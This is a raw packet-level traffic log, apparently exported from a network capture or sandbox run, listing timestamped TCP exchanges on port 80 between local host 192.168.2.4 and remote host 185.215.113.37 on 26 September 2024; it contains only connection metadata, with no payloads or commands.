Sep 26, 2024 22:40:19.575237036 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.575282097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.575308084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.575326920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.575340033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.575356960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.575371981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.575381041 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.575381041 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.575393915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.575412989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.575428963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.575429916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.575428963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.575450897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.575475931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.575818062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.575833082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.575850010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.575865984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.575871944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.575885057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.575897932 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.575897932 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.575902939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.575917959 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.575948000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.575948000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.649581909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.649606943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.649626017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.649807930 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.649808884 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.699565887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.699583054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.699605942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.699656010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.699742079 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.700452089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.700465918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.700481892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.700498104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.700514078 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.700515985 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.700531006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.700544119 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.700550079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.700567007 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.700587034 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.700628996 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.701306105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.701318979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.701334000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.701349974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.701368093 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.701369047 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.701386929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.701389074 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.701404095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.701414108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.701436043 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.701452017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.701453924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.701467037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.701514959 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.701647043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.701662064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.701680899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.701697111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.701714039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.701733112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.701741934 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.701742887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.701756954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.701769114 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.701769114 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.701773882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.701802969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.701802969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.701822042 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.701958895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.701971054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.701987982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.702003956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.702012062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.702022076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.702022076 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.702102900 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.702204943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.702223063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.702271938 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.702383041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.702399015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.702416897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.702438116 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.702472925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.702472925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.702744007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.702758074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.702811003 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.704751015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.704771042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.704787016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.704803944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.704812050 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.704845905 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.704869032 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.704885006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.704901934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.704919100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.704942942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.704951048 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.704969883 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.704997063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.705039978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.705055952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.705071926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.705086946 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.705087900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.705116034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.705132008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.705136061 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.705136061 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.705137014 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.705197096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.705213070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.705224037 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.705229044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.705248117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.705257893 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.705265999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.705281973 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.705298901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.705315113 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.705364943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.705380917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.705395937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.705411911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.705425024 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.705426931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.705442905 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.705444098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.705465078 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.705465078 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.705481052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.705497026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.705501080 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.705517054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.705528975 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.705528975 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.705537081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.705553055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.705569029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.705574036 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.705574036 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.705586910 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.705595016 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.705612898 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.705635071 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.705725908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.705741882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.705755949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.705771923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.705789089 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.705794096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.705806971 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.705838919 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.705840111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.705879927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.705894947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.705909967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.705926895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.705926895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.705944061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.705950022 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.705950022 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.705962896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.705981016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.705984116 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.705984116 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.705996990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.706002951 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.706016064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.706023932 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.706037045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.706042051 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.706053019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.706060886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.706068993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.706082106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.706087112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.706098080 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.706105947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.706115961 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.706149101 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.706150055 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.706196070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.706213951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.706239939 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.706279039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.766750097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.766772985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.766788960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.766844988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.766921997 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.828392029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.828526020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.828541040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.828578949 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.828578949 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.828670025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.831707954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.831772089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.831788063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.831804037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.831829071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.831844091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.831861019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.831893921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.831911087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.831914902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.831916094 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.831916094 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.831916094 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.831916094 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.831916094 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.831916094 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.831929922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.831960917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.831978083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.831993103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.832009077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.832015038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.832015038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.832015038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.832026005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.832041025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.832043886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.832072020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.832075119 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.832088947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.832096100 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.832109928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.832122087 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.832128048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.832139015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.832146883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.832160950 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.832165003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.832189083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.832189083 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.832189083 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.832211971 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.832216978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.832237959 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.832257986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.832268953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.832288980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.832304001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:19.832376003 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.832376003 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.921760082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:19.926794052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.152714968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.152740002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.152755976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.152771950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.152786970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.152803898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.152820110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.152838945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.152920008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.152920961 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.152920961 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.153217077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.153307915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.153325081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.153338909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.153366089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.153436899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.153450966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.153470039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.153486967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.153487921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.153487921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.153487921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.153487921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.153487921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.153503895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.153544903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.153564930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.153568029 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.153573990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.153583050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.153592110 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.153635025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.153672934 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.153805017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.154005051 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.154014111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.154042006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.154061079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.154071093 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.154076099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.154093981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.154110909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.154110909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.154110909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.154131889 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.154139042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.154154062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.154172897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.154200077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.154200077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.154200077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.154200077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.154211998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.154230118 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.154242039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.154258966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.154263020 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.154274940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.154284954 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.154292107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.154313087 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.154313087 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.154331923 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.243237972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.243257046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.243489027 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:20.355535984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.355559111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:20.355578899 CEST	80	49730	185.215.113.37	192.168.2.4
